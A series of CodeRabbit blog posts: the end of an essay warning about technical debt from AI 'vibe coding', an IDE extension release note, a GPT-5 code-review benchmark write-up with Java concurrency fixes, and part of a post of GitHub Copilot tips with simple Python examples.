for prototyping, but for production systems? 
The unpredictability weakens trust, control, and reliability – qualities critical to scalable software development. It’s like letting a chaotic neutral wizard refactor your codebase. ## **Technical debt at the speed of (vibey) prompts** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a7c48c79e5eb9aaec7deae7a618d3e05dfc00816548676b9ab949a656f66d3b9_89e1f75e15.png) Let’s be honest: vibe coding feels amazing at first. You get a working prototype in an hour instead of a week. But without the right guardrails, that speed can lead to: * Silent bugs * Duplicate logic * Incoherent architecture * Inconsistent patterns * Unreviewed PRs * Zero test coverage * Hidden complexity Without understanding the structure, future maintenance becomes painful. Reviewing takes exponentially longer and you’re more likely to miss things. Debugging becomes detective work. Scaling becomes guesswork. The time you save upfront can cost much more later. And that’s not even addressing the PR backlog you’re creating. Suddenly, you're in a codebase that *works* but can't be touched without summoning six hours of debugging, a million tokens-long context window, and three therapy sessions. ## **Vibe coding: The fragility multiplier** Vibe coded systems tend to: * Break under edge cases. * Confuse the next dev (or even future-you). * Fail silently in production. The result? You spend **more** time reviewing, fixing, explaining, and rewriting things than you saved by prompting it in the first place. You've created a system that's not just fragile — it's fragile *and* mystifying. ## **Testing, security & all the stuff AI doesn’t do by default** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/6a96b6142a4d6b37c24f1cf24b961c788a7df35d33f461fa6ac5030287df2361_cccf1a39e2.png) AI won’t warn you if it accidentally vibe codes sensitive data, hardcodes an API key, or skips input validation. It won’t enforce domain-driven design or test coverage unless you ask it to, perfectly. 
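As a small illustration of the defaults that are easy to lose when you vibe code, here is a hedged sketch of the two habits named above: keeping an API key out of the source and validating input before using it. Everything in it is an assumption made for the example (the `PAYMENTS_API_KEY` variable name, the signup payload shape, the deliberately simple email pattern); it is not taken from any real service.

```python
import os
import re

# Hypothetical variable name; the point is that the key comes from the
# environment rather than being written into the source file.
API_KEY_ENV_VAR = "PAYMENTS_API_KEY"

# Deliberately simple pattern: something@something.something, no spaces.
EMAIL_PATTERN = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def load_api_key(env=os.environ):
    """Read the API key from the environment and fail loudly if it is missing."""
    key = env.get(API_KEY_ENV_VAR)
    if not key:
        raise RuntimeError(f"{API_KEY_ENV_VAR} is not set")
    return key


def validate_signup(payload):
    """Return a list of validation errors for a signup payload (empty if valid)."""
    errors = []
    email = payload.get("email")
    if not isinstance(email, str) or not EMAIL_PATTERN.match(email):
        errors.append("email is missing or malformed")
    age = payload.get("age")
    # bool is a subclass of int in Python, so reject it explicitly.
    if isinstance(age, bool) or not isinstance(age, int) or not 0 < age < 150:
        errors.append("age must be an integer between 1 and 149")
    return errors


print(validate_signup({"email": "dev@example.com", "age": 30}))  # → []
print(len(validate_signup({"email": "nope", "age": True})))      # → 2
```

Neither function is sophisticated. The point is that both are explicit decisions someone has to make, and generated code tends to leave them out unless the prompt asks for them.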
Without strong engineering intuition, vibe coding can lead to real-world vulnerabilities and brittle systems, especially when security is an afterthought instead of a default. We’ve seen this with the [Tea Dating app](https://x.com/rauchg/status/1949197451900158444) leaking the private information of over 70,000 customers and AI deleting the [SaaStr’s production database.](https://www.theregister.com/2025/07/21/replit_saastr_vibe_coding_incident/) AI doesn’t: * Write unit tests unless you explicitly ask. * Understand your threat model. * Follow OWASP guidelines. * Validate user input unless prompted perfectly. * Log responsibly (hello, hardcoded secrets and PII leaks). If you don’t have strong engineering habits already or if you’re not willing to stick to your current habits even in this vibey era, you’ll never know these things are missing until they bite you — hard — in prod. ## **When vibes replace struggle, you lose the intuition** Struggling with bugs, tracing stack traces, and learning from mistakes builds technical intuition. That frustration is part of the learning path and skipping it can lead to shallow confidence and dependency. Without struggle, developers don’t build the muscle to solve unfamiliar problems independently, and that’s where true expertise lies. Yes, debugging sucks. But tracing a nasty bug through 12 layers of abstraction teaches you something an LLM never will. The struggle builds: * Mental models of systems * Pattern recognition * The instinct to smell code rot before it crashes When you skip that, you build shallow confidence on top of shallow understanding. And when things go sideways, you won't have the tools to fix it. ## **Where vibe coding *does* shine** Let’s give credit where it’s due. 
Vibe coding is awesome for: * Rapid prototyping * Generating boilerplate or repetitive tasks * Teaching programming concepts in an interactive way * Communicating product ideas through rough mockups * Brainstorming with frameworks or patterns Used with awareness, it becomes a helpful tool to the vibe coder. Used blindly, it becomes a liability. We need to understand as devs and teams where to draw the line. And when to bring in support in the form of more rigorous code reviews and unit tests to tackle the technical debt before it solidifies in your codebase. ## **We’re not losing the craft — we’re drowning it in debt** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/563cc8f7a53cc72f496756d8a69291960c1c505351f03e5cde26ab858f5a4a01_c0090f32d8.png) The biggest risk isn’t that AI kills developer craftsmanship. It’s that **technical debt becomes invisible**. As AI coding becomes the default way to build, systems will *look* complete — but underneath, they’ll be messy, fragile, and undocumented. And no one will know until they try to extend them. This matters *a lot* in domains like: * Healthcare * Finance * Infra * Safety-critical systems However, there’s also a chance that vibe coding evolves into a new layer of development, one that coexists with craftsmanship, where AI handles the tedious things like boilerplate and first-pass code reviews and humans focus on the architecture, ethics, and design behind systems. ***That’s*** the timeline we want to find ourselves in and how we’re approaching AI at CodeRabbit. We’re focused on AI tools that supplement your coding agents by helping you find and prevent technical debt and bugs from making it into production – rather than the other way around. ## **To vibe code or not to vibe code?** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0803217a8d7664f297fd1af34b4cf992ce0520d09282962939e3224b25eff142_54ade5d7a2.png) This isn’t an anti-vibe coding article. 
I’m using AI coding agents in my workflow every day. But tools should amplify our skills, not replace them. They should do the work that’s tedious and repetitive – not the thinking and strategy. Vibe coding isn’t evil, it’s just easy to misuse. The real danger is letting it become the default mindset on your project before the developers on your team understand what they’re building. Let’s embrace AI, but keep coding as a craft alive, because good software isn’t just about what works. It’s about what lasts, long after the original dev has gone — and long after the vibes have faded. ***Need help keeping tech debt out of prod? Try our*** [***AI code review tool free today.***](https://app.coderabbit.ai/login???free-trial)

Code with AI, review with CodeRabbit’s IDE extension, apply fixes in one click

Edgar Cerecerez — Wed, 13 Aug 2025 00:00:00 GMT

The VS Code extension we launched back in May has been a game changer for many reasons – but the main one is that it lets you stay in a state of flow by coding and reviewing in the same place: your IDE. With this latest release, we've added:

* **Ability to send prompts to AI coding tools.** You can code with your favorite AI coding assistants, get intelligent reviews from CodeRabbit, and apply all suggested changes with the provided prompts - all without leaving your IDE.
* **One-click acceptance of suggested changes.** Our most requested feature. Apply every suggestion at once instead of clicking through them individually.
* **Full context awareness.** The same level of context awareness that CodeRabbit's PR reviews benefit from is now taken into account for users with Pro accounts. That means code reviews in the IDE now utilize [Learnings](https://docs.coderabbit.ai/integrations/knowledge-base#learnings%E2%80%8B), run code quality and code security tools, and adhere to agent Code Guidelines.
* **More integrations.** Integrations with Codex CLI, Cline, Roo, Kilo Code, and Augment Code.
* **Ability to give feedback**. You can also provide feedback on each suggestion.

That means you can review code in the IDE, just like a human PR reviewer would, and then quickly apply those changes with the help of CodeRabbit or your AI coding tools, all before you even make a pull request.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/bfdcfeed2b10a3fe60e76b94aab31811176b77d2e9bfb90ca9e199180d05bbcb_966cba384a.jpg)

## **What that means for you**

This has several great benefits:

* **It improves the iteration loop.** You can code with AI, get feedback from CodeRabbit's AI reviews, and apply all suggested changes more quickly than before.
* **Cleaner PRs**. PRs can be saved for any stray issues and for human reviews.
* **You look better.** Why ship error-filled code to your boss and team if you don’t have to? CodeRabbit’s IDE reviews are a great way to double-check your code before you open a merge request. And now, they’re even easier.

We hope this will improve the speed at which you ship – and help ease the burden of PR reviews as a whole.

## **Future roadmap**

* **User-level Learnings:** We’ll be adding the ability to add Learnings or provide feedback on suggestions, so our agent automatically learns which suggestions you like and dislike. We currently have org-wide Learnings in the SCM but want to extend this feature to individual developers who want to add custom Learnings that will only apply to them.
* **Web Queries:** We plan to integrate our context-enhancing features into our IDE tool so your reviews catch more bugs with fewer false positives and are always up to date on versions, library documentation, and vulnerabilities, even if the LLM isn’t.
* **Docstrings**: Want to create Docstrings before you merge? We’ll be adding this feature, which is currently part of our PR reviews, to our IDE reviews in the future.

A reminder: Our IDE reviews are free (with rate limits). [Download](https://coderabbit.link/2GbsyI9) the VS Code extension.

Benchmarking GPT-5: Why it’s a generational leap in reasoning

Christopher Cassion — Thu, 07 Aug 2025 00:00:00 GMT

The wait is over! As the leading AI code review tool, CodeRabbit was given early access to OpenAI’s GPT-5 model to evaluate the LLM’s ability to understand, reason through, and find errors in complex codebases.

As part of our GPT-5 testing, we've conducted extensive evals to uncover its technical nuances, capabilities, and use cases with a focus on the model’s ability to understand and reason through potential issues and bugs in codebases.

Below, you’ll find a breakdown of our structured evaluation approach, detailed findings relative to other popular models, and how we’re planning to incorporate GPT-5 into your AI code reviews to make them even better.

## TL;DR: The results

![](https://victorious-bubble-f69a016683.media.strapiapp.com/0d423125ac6e13bd04e8f57cc538b1a54ec7ac26efe7cf9d0f706d6ffa12946a_fbbb66650b.png)

* GPT-5 outperformed Opus-4, Sonnet-4, and OpenAI’s O3 across a battery of 300 error-diverse pull requests of varying difficulty.
* GPT-5 scored highest on our comprehensive test and found 254 out of 300 bugs, or 85%, where other models found between 200 and 212 – 16% to 22% fewer.
* On our 25 hardest PRs from our evaluation dataset, GPT-5 achieved the highest ever overall pass rate (77.3%), representing a **190% improvement over Sonnet-4**, **132% over Opus-4**, and **76% over O3**.

## How we evaluated GPT-5

![](https://victorious-bubble-f69a016683.media.strapiapp.com/dc5371399f75edd8f3b69ff722562226b58cb568f53592c43e1cf4d95e4a88d6_fba24c2b32.png)

We ran the same tests we run on all our models. These evals integrate GPT-5 into our context-rich, non-linear code review pipeline to see how it would perform in a typical code review.

CodeRabbit's evaluation process includes:

* **LLM-based judging:** We perform dual-layered LLM-based judgment that looks at both qualitative and quantitative data such as the quality of a review and a pass/fail of the model’s accuracy.
* **Human-based judging:** We then perform qualitative checks by humans to verify the quality of review comments and depth of the model’s reasoning. * **LLM-based metrics collection:** We collect metrics that we believe are indicative of a high quality code review and weigh them by their importance. These metrics include: * Actionable comment counts * Readability scores (Flesch Reading Ease score) * Average word count * Sentence count * False positives (hallucinations) **Note:** Our evaluations were conducted on various ‘snapshots’ of GPT-5 that OpenAI shared with us leading up to the release of GPT-5. While our results changed somewhat with different snapshots, their relative consistency allowed us to make the observations below. The released model might be slightly different. ## GPT-5 capabilities: Evaluation results and analysis Our evaluation of GPT-5’s capabilities found that the model certainly lives up to the hype. GPT-5 outperformed all other models we’ve tested on our datasets – by a lot. ### Comprehensive evaluation scores GPT-5’s weighted score from our comprehensive evaluations was **between 3465 and 3541** on different test runs – which is almost 200 points above OpenAI’s O3 model and Anthropic’s Sonnet 4, which were previously our highest scoring models. The maximum possible score is 3651. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b3f3cb080cecaf493e2bbac857ba8016ae284e066a0f9068c2a01f03a4159902_a541da0283.png) Full evaluation scores: * GPT-5: 3465–3541 * O3: 3288 * Sonnet-4: 3242 * Opus-4: 3170 **Takeaway:** While a 200 point or 5% increase might not seem significant, the way our tests work is that models initially rack up points finding low-hanging fruit like infinite loops and exposed secret keys. After a point, it then becomes progressively harder to get points since all the remaining points come from flagging much harder to find issues. 
GPT-5’s ability to get so many more points than other models, therefore, represents a significant leap forward in reasoning.

### Pass/fail scales

We also give models a pass/fail score based on how many of the 300 error patterns in our dataset PRs the model was able to find. GPT-5 also achieved the highest success rate on this scale that we’ve ever seen at **254 to 259 out of 300.**

Compare that to the performance of other models:

![](https://victorious-bubble-f69a016683.media.strapiapp.com/5eb073eebdb84dc69d214b4785a12bc3e81941a1bcb4b44a90327770aaaaa289_1e99ea52ad.png)

* GPT-5: 254-259
* Sonnet-4: 212
* O3: 207
* Opus-4: 200

Since all models find roughly the 100 easiest error patterns, looking only at the most difficult 200 shows an even greater improvement: GPT-5 caught 78% of those error patterns, while the other models caught only 54% to 58%.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/8877254cea5e8e3b2d12d62247d3486498727e13e49c1917c1428ee79ff6ae26_f5830c0a74.png)

* GPT-5: 157
* Sonnet-4: 117
* O3: 113
* Opus-4: 108

**Takeaway:** Similar to our comprehensive metric, the additional error patterns that GPT-5 was able to find are particularly hard for LLMs to spot, like concurrency bugs or inconsistent domain keys across environments, suggesting the model’s increased ability to reason.

## Hardest PRs test

To stress-test each model, we curated 25 of the most difficult pull requests from our Golden PR Dataset. These PRs represent real-world bugs that span:

* Concurrency issues (e.g. TOCTOU races, incorrect synchronization)
* Object-oriented design flaws (e.g. virtual call pitfalls, refcount memory model violations)
* Performance hazards (e.g. runaway cache growth, tight loop stalls)
* Language-specific footguns (e.g. TypeScript misuses, C++ memory order subtleties)

Each model was tested across three runs.
Below is the **average pass rate** on this Hard 25 benchmark:

![](https://victorious-bubble-f69a016683.media.strapiapp.com/e66f367a5f31c4b6b61257209a5d38b1752471f4078aa25afe3138468a037268_dd91ebefcd.png)

### Pass rate chart

| **Model** | **Mean Pass Rate (%)** |
| --- | --- |
| Sonnet-4 | 26.7% |
| Opus-4 | 33.3% |
| O3 | 44.0% |
| **GPT-5** | **77.3%** |

**Takeaway**: GPT-5 shines where accuracy, contextual linkage, and depth matter most. It consistently delivers **the most complete, test-ready, and forward-compatible code review output** among all models we’ve tested to date.

## **How many kinds of bugs does GPT-5 actually catch?**

To better understand ***what kinds*** of issues each model identifies, not just how many, our team reviewed every comment across a set of hard PRs and classified them into categories like **Concurrency**, **Security**, and **Object-Oriented Design**.

We applied **deduplication** across models: if multiple models flagged the same core issue (even if phrased differently), it was counted only once per PR. This ensured we were measuring **issue coverage**, not comment verbosity. Then, for each model, we tallied what percentage of those unique issues it successfully caught.

### **Takeaway:**

* **GPT-5 leads in almost every category**, identifying **over 60%** of concurrency, performance, and memory bugs, and an impressive **80%** of security issues.
* **Security remains the most striking gap**: GPT-5 found 80% of security-related bugs, while the next best model (O3) found only 40%.
* Even on basic concurrency and performance problems, GPT-5 consistently outperforms by 20-30 points.
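The deduplicate-then-tally procedure described above can be sketched in a few lines. This is only an illustration under stated assumptions, not our evaluation code: the model names, PR ids, issue keys, and category mapping below are all hypothetical, and the sketch assumes each flagged issue has already been normalized to a shared key so that differently phrased comments about the same bug compare equal.

```python
from collections import Counter

# Hypothetical mapping from a normalized issue key to its category.
CATEGORY = {
    "toctou-race": "Concurrency",
    "unbounded-cache": "Performance",
    "sql-injection": "Security",
}

# Hypothetical findings: model name -> set of (pr_id, issue_key) pairs.
findings = {
    "model_a": {("pr-1", "toctou-race"), ("pr-2", "sql-injection"), ("pr-3", "unbounded-cache")},
    "model_b": {("pr-1", "toctou-race"), ("pr-2", "sql-injection")},
    "model_c": {("pr-1", "toctou-race")},
}


def coverage_by_category(findings, category):
    """Return {model: {category: percent of unique issues caught}}."""
    # Deduplicate: the union counts each (PR, issue) pair once,
    # no matter how many models flagged it.
    unique_issues = set().union(*findings.values())
    totals = Counter(category[key] for _, key in unique_issues)

    coverage = {}
    for model, found in findings.items():
        caught = Counter(category[key] for _, key in found)
        # Counter returns 0 for categories the model never hit.
        coverage[model] = {
            cat: 100 * caught[cat] / total for cat, total in totals.items()
        }
    return coverage


coverage = coverage_by_category(findings, CATEGORY)
```

Because the denominator is the set of unique issues rather than the number of comments, a model that repeats itself or writes longer comments gains nothing, which is the point of measuring coverage instead of verbosity.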
![](https://victorious-bubble-f69a016683.media.strapiapp.com/42a77c378abd404ac3767bbd3a41c31ca786b8377c895c39bb19608579e8711e_74701ded66.png)

## **Example: GPT-5 uncovers hidden concurrency risks missed by others**

In this pull request, a subtle concurrency bug stemmed from a combination of **double-checked locking** and **unsafe access to a shared** `HashMap` in a singleton service class. While most models flagged the obvious thread-safety issue, GPT-5 delivered a comprehensive, production-ready fix, resolving not just the symptom but the architectural flaws underneath.

### **The problem**

The `OrderService` singleton used a `HashMap` to store orders, while concurrent updates were made from a fixed thread pool. This design lacked synchronization, leading to potential data corruption. On top of that, the singleton was initialized using a non-volatile static field, opening the door to **unsafe publication** and partially constructed objects.

### **GPT-5’s recommendations**

GPT-5 went beyond the basic fix and stitched together a complete concurrency hardening plan:

### **1\. Replace the map with a thread-safe alternative**

```plaintext
- private final Map orders = new HashMap<>();
+ private final Map orders = new ConcurrentHashMap<>();
```

✅ GPT-5 also explained why: “Concurrent updates... are executed on a plain HashMap... not thread-safe and can lead to undefined behavior.”

---

### **2\. Fixed the broken singleton instantiation**

```plaintext
- private static OrderService instance;
+ private static volatile OrderService instance;
```

Or optionally:

```plaintext
private static class Holder {
    private static final OrderService INSTANCE = new OrderService();
}

public static OrderService getInstance() {
    return Holder.INSTANCE;
}
```

✅ It flagged the classic memory visibility issue with double-checked locking and offered an alternate pattern to make construction thread-safe.

---

### **3\. Added a test reset hook to prevent state leakage**

```plaintext
// Inside OrderService.java
void clearAllForTest() {
    orders.clear();
}
```

✅ This enables isolated, repeatable tests when working with a shared singleton across multiple test cases.

---

### **4\. Added timeouts to catch async test hangs**

```plaintext
- future.get(); // Wait for completion
+ assertTimeoutPreemptively(Duration.ofSeconds(5), () -> future.get());
```

✅ GPT-5 proactively hardened the test suite by guarding against test flakiness in asynchronous flows.

---

### **What Sonnet-4 and Opus-4 missed**

Both models correctly flagged the unsynchronized `HashMap` and replaced it with `ConcurrentHashMap`. However, neither delivered a complete or production-safe remediation:

* ❌ **Singleton issues unresolved**: Sonnet-4 ignored the broken double-checked locking; Opus-4 mentioned it but skipped the actual fix (no `volatile`, no `holder` idiom).
* ❌ **No test safety provisions**: GPT-5 introduced `clearAllForTest()` and timeout guards; Sonnet-4 and Opus-4 missed these entirely or only noted them passively.
* ❌ **Lacked architectural context**: Neither model cross-referenced the broader codebase or justified changes with evidence. GPT-5 backed each fix with reasoning that traced across services, tests, and threading behavior.
* ❌ **Limited scope**: Sonnet-4 made a single, surface-level fix. Opus-4 added some useful logging but missed the deeper structural risks GPT-5 fully addressed.

---

### **Why this matters**

The real value of GPT-5’s review lies in its **depth and awareness**. It not only patched the visible race, but also:

* Identified deeper architectural risks
* Cross-referenced test reliability and code quality
* Delivered a set of changes that are *safe to merge immediately*

**This isn’t just a fix: it’s engineering insight.** GPT-5 showed how an AI reviewer can reason across system layers, suggest durable solutions, and help teams write safer code with less guesswork.
## **What’s new (and exciting) about GPT-5**

![](https://victorious-bubble-f69a016683.media.strapiapp.com/8ade25673f150f2b2699d71a18f124853e413d061b3f73f98f1695b7efde0955_348fc54245.png)

Beyond metrics and the specific things our tests were evaluating, we found that GPT-5 exhibited new behavioral and reasoning patterns.

* **Advanced contextual reasoning:** GPT-5 proactively planned multiple review steps ahead, showcasing expansive creative reasoning rather than strict input-bound logic. For example, in our concurrency-oriented test focused on a ‘check-then-act race condition’ scenario, GPT-5 connected evidence across files. It was the only model to detect the risk of duplicate creation, and it introduced an atomic refund pattern grounded in the enum and test suite.
* **Chain-of-thought reasoning via review threads**: In an object-oriented test focused on a virtual call in a constructor, GPT-5 first identified a misused polymorphic override and then adjusted its recommendations based on its own earlier suggestions, building its later reasoning on what it had already found.
* **Evidence-based diff justification**: In a performance test focused on unbounded cache growth (no eviction), GPT-5 identified architectural memory risks that other models missed, and backed its recommendation with diff context, usage patterns, and suggested safeguards.
* **Forward-thinking suggestions**: In a concurrency test focused on incorrect sync primitive usage, GPT-5 not only patched the race but also suggested how to structure future additions, lock hierarchies, and test guardrails to prevent regressions.
* **Granular, task-oriented recommendations:** Unlike previous models, GPT-5 detailed explicit follow-up tasks, creating actionable workflows within the review process itself. This makes the model much better for multi-step workflows.
## How we’re using GPT-5 in our AI code reviews We’re excited that GPT-5 represents a significant advancement in AI-powered code review, pushing the boundaries in detail, accuracy, and contextual reasoning. That’s why we’ll be using GPT-5 as the core reasoning model in our pipeline – starting today. We’re excited that it will be able to find more issues and create more in-depth, context-rich reviews. If you’ve never tried CodeRabbit, tried it previously, or are a current user, we’d love to hear how you think GPT-5 is improving your review quality and experience. ***Try our*** [***free 14-day trial today***](https://coderabbit.link/i72LrCC) ***to see the power of GPT-5 yourself.***

GitHub Copilot best practices: 10 tips & tricks that actually help

Ankur Tyagi — Wed, 23 Jul 2025 00:00:00 GMT

Copilot has quickly become a staple in the modern developer’s toolkit. Powered by OpenAI’s models, it offers AI-driven code suggestions based on what you’re writing — right in your editor. Used well, it can significantly boost productivity. Microsoft’s data suggests it may help developers [code up to 55% faster.](https://github.blog/news-insights/research/research-quantifying-github-copilots-impact-on-developer-productivity-and-happiness/) ![](https://victorious-bubble-f69a016683.media.strapiapp.com/86528bb7dbf8ea8e1fff678ff998160e18fcd5cef17a07c9e8528ae8ecebf85e_66a82275f7.png) But here’s the catch: **Copilot isn’t a magic wand**. Left on autopilot, it can feel more like an eager junior dev making confident guesses than a reliable coding partner. The difference between a helpful Copilot and a frustrating one often comes down to how you use it — and whether you’ve built a workflow that plays to its strengths. In this article, we’ll walk through how Copilot fits into the broader [AI dev tool stack](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack) and share practical GitHub Copilot tips and tricks for using it more effectively. These strategies are drawn from both our own experience and the thousands of developers using CodeRabbit’s AI code review platform. With the right approach, Copilot can go from a neat autocomplete toy to a genuinely valuable part of your daily development routine. ## GitHub Copilot tip 1: Play to Copilot’s strengths Not every coding task is equal in Copilot’s eyes. One of the most important GitHub Copilot best practices is to use it where it shines, not force it to create code where it doesn’t. Copilot excels at specific categories of tasks that can save you significant time. 
Copilot is especially good at:

* Writing *repetitive code*
* Generating *unit tests*
* *Debugging syntax issues*
* *Explaining code*
* *Generating regex patterns*

These are areas where it has seen lots of examples and can confidently suggest solutions. For example, if you have a function and need to write several tedious unit tests for it, Copilot can draft them in seconds. Consider this simple function and its tests:

def multiply(a, b):
    """Return the product of a and b."""
    return a * b
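Tests for a function like this tend to be mechanical, which is exactly why they are a good fit for an assistant. As a rough sketch of the kind of test class that could be drafted here, using Python's built-in `unittest` (the specific cases are our own illustrative picks, not Copilot's actual output):

```python
import unittest


def multiply(a, b):
    """Return the product of a and b."""
    return a * b


class TestMultiply(unittest.TestCase):
    """Illustrative cases covering signs, zero, and floats."""

    def test_positive_numbers(self):
        self.assertEqual(multiply(3, 4), 12)

    def test_negative_numbers(self):
        self.assertEqual(multiply(-2, 5), -10)

    def test_zero(self):
        self.assertEqual(multiply(0, 99), 0)

    def test_floats(self):
        # Floats are compared approximately to avoid rounding surprises.
        self.assertAlmostEqual(multiply(0.5, 0.2), 0.1)
```

Saved in a test file, this can be run with `python -m unittest`. Even for something this small, it is worth reading the generated cases yourself to confirm they cover the edge cases you care about.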

Copilot can help create unit tests for the above function quickly:

![](https://victorious-bubble-f69a016683.media.strapiapp.com/a020ae014359b847fab9113d7858bb6d9a7e259e48548cea9dd7c9850a038aaa_c2aea7c5a7.png)

In a scenario like the above, Copilot generated the **TestMultiply** class almost entirely from a comment or prompt. It’s excellent for boilerplate code, repetitive patterns, and well-defined algorithms.

On the flip side, Copilot is **not** a silver bullet for everything. It’s not designed to handle tasks unrelated to coding (don’t expect it to plan your database schema or do UI design work) and won’t replace your problem-solving skills. Think of Copilot as a junior developer at your side. It’s fast and often right about everyday tasks, but you (the senior developer) are still in charge of decision-making and critical thinking.

Use Copilot for the “heavy lifting” on mundane code and let it suggest solutions for routine problems, but always apply your judgment on whether to use those suggestions. That way, you’ll save time and reduce drudgery while keeping yourself focused on the challenging problems and design decisions.

## **GitHub Copilot tip 2:** Provide ample context (open files, set imports, etc.)

A **hot tip for GitHub Copilot** is to open all the relevant files in your project when you’re coding a particular feature. That’s because Copilot works by looking at the context in your editor to predict what you might want next. The more relevant context you give it, the better the suggestions. For instance, if you’re implementing a function in **utils.py** that interacts with **models.py**, have both files open. Copilot will process all open tabs (often called “neighboring tabs”) to inform its suggestions. This broader view helps it understand your project structure and produce more accurate code.
In fact, simply opening related files in VS Code or your IDE can significantly enhance Copilot’s completions by providing extra context for definitions and usages across your project. Similarly, explicitly set up your imports, includes, and dependencies before expecting the best suggestions. You know what libraries or frameworks you intend to use – tell Copilot by importing them at the top of your file. This gives Copilot a heads-up on what tools it should use. It’s often best to manually add the modules or packages (with specific versions, if needed) before asking Copilot to generate code using them. By doing so, you avoid Copilot defaulting to an outdated library or missing an import. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/7f4a376d7d63eacef325d8fe5aafacc00fe892367628a86a2d05b180946ed4f0_a57f1fa921.png) **For example**, if you plan to use **pandas** in your code, write **import pandas as pd** yourself; then when you ask Copilot to manipulate a DataFrame, it will already know to use pandas and won’t attempt a pure-Python solution or an incorrect import. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e6813bfa6b55d4302598e2cf571b8ae0c1d3b84a57b311c66deb753d84353b90_e77d6ff97d.png) Also, be mindful of irrelevant context. Copilot’s window of attention is limited. If you have a lot of unrelated files open or leftover code in your editor, close or remove them when you switch tasks. Keeping only the pertinent files and context visible ensures Copilot isn’t “*distracted*” by code that doesn’t matter to your current goal. ## **GitHub Copilot tip 3:** Write descriptive comments and docstrings as prompts You understand prompt engineering when you’re directly calling an LLM. But did you know that there are some sneaky ways to prompt engineer in Copilot? One of the most effective GitHub Copilot tips is to guide the AI with natural language comments. Think of writing comments as a form of *prompt engineering*. 
Before you write the code, describe in plain English (or your preferred language) what you intend the code to do.

**For example**, suppose we want a function to sort a list of names case-insensitively. We might start with:

![](https://victorious-bubble-f69a016683.media.strapiapp.com/f2175b371db1bffd142060c3ef4c7917f8548a906999484c6704e4541a94755e_d98dee5958.png)

The moment you write that comment and pause, Copilot will likely suggest the rest of the function (e.g., using `sorted(names, key=str.lower)`). A top-level comment at the start of a file, or a docstring/comment above a function, helps Copilot understand the overarching objective before diving into implementation details. This process is similar to giving a human colleague a quick overview of the task at hand: it sets the stage so the following code makes sense in context.

When writing these comments, be clear and *specific* about the desired behavior. Mention any requirements or constraints. For a more complex example, suppose you need a function to format a person’s name as **"LASTNAME, Firstname"**. You could provide an example in the comment to clarify your intent:

![](https://victorious-bubble-f69a016683.media.strapiapp.com/11cdb380225ad755b7cd7402514946cb691cb4701a3707c56f5ce35182fdbdb4_92ef0360a6.png)

By including the example of input and output, you give Copilot a crystal-clear idea of what you want, and its suggestion is exactly the desired solution. The comment acted as a prompt that described the goal and even provided a test case, and Copilot filled in the implementation.

**Use this technique liberally.** Add a brief docstring or comment for each function describing *what* it should do (and how at a high level, if you have an approach in mind). Copilot can detect the comment syntax for your language and will often even help complete the comment if it recognizes a pattern (for example, it might suggest a template for a Python docstring).
By writing specific, well-scoped comments before the code, you essentially “program” Copilot with your intent.

**Remember the old saying**: garbage in, garbage out. If you feed Copilot an ambiguous comment like “# do something with data”, you’ll get ambiguous code. Instead, describe the task clearly – *“# Calculate the average value from a list of numbers, ignoring any nulls”* – and watch Copilot more reliably produce the correct logic.

## **GitHub Copilot tip 4:** Use meaningful names for clarity

You might hate being a stickler about style, but variable and function names are another form of context that Copilot relies on. A tip that might seem obvious but is often overlooked is to **give your functions and variables meaningful, descriptive names**. If you have a function named **foo()** or a variable named **data1**, Copilot has virtually no clue what you intend, beyond what it can infer from a possibly sparse usage context. In contrast, names like **calculate\_invoice\_total()** or **user\_email\_list** immediately convey intent to humans and the AI.

In fact, Copilot’s suggestions will improve dramatically when your code is self-documenting. A function called **fetchData()** doesn’t mean much to Copilot (or to a coworker) compared to a function named **fetch\_airport\_list()** or **get\_user\_profile()**. The latter two give far more hints about what the function should do.

**For example**, consider these two scenarios:

**Vague naming:**

# Determine if a user is eligible for promotion
def check(user, data):
    ...  # body left for Copilot to suggest

With a function name like check and a parameter data, Copilot might struggle. “Check” could mean anything. Could it check a password or a value in data? Its suggestions might be generic or incorrect because it’s guessing your intent. **Descriptive naming:** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/5f6103fc9e36f5c52cd09dbd485d3a946e26ecc38296ae1b7ef145f73331e5b5_ede2953a79.png) The function name **is\_user\_promotable** clearly signals a boolean decision, and the parameters **user\_profile and promotion\_rules** indicate the data involved. Copilot can use this information to guess that you might iterate over rules, check user attributes, etc., and its completion will align with that logic. Adopting clear naming conventions isn’t just a general coding best practice for developers. It’s a GitHub Copilot best practice, too, because Copilot can only infer intent from what it sees. If what it sees are meaningful identifiers and not cryptic ones, it will return far more relevant code. This tip also pays dividends for code maintainability – since you’ll get better AI suggestions *and* cleaner code for your team. ## **GitHub Copilot tip 5:** Pair Copilot with CodeRabbit for AI-assisted code reviews While Copilot is fantastic during the coding phase, what about after you’ve written your code? Enter CodeRabbit, an AI-powered code review developer tool that complements Copilot in the development workflow. CodeRabbit acts like an AI “pair reviewer,” scanning your code (either in the [IDE](https://www.coderabbit.ai/ide) or on your [Git platform](https://docs.coderabbit.ai/platforms/github-com)) and providing feedback and suggestions for improvement. 
![](https://victorious-bubble-f69a016683.media.strapiapp.com/27be2d10c3a4399dd4b6e56ab552ecff38079a423dd11a9e783500b03936acb6_a7e0fde34e.png)

We’ve found that using Copilot and CodeRabbit together creates a powerful feedback loop: Copilot helps you generate code quickly and CodeRabbit helps ensure that code meets quality standards before it gets merged.

* You wouldn’t ask the developer who wrote the code to review it, so why ask the same AI system to do so?
* An AI code reviewer also allows you to standardize your quality gate if your team is using multiple AI coding agents – as so many teams are these days.
* Finally, purpose-built AI tools like CodeRabbit do a more thorough job and have more features, which means the average user is able to find 50% more bugs in half the time they’d typically spend on a code review.

CodeRabbit integrates into VS Code and pull requests on platforms like GitHub. In your IDE, you can invoke CodeRabbit to review the file or the diff you’re working on. It will add AI-powered inline review comments directly in the code, pointing out potential issues, much like a [human reviewer](https://www.devtoolsacademy.com/blog/ai-code-reviewers-vs-human-code-reviewers/) would.

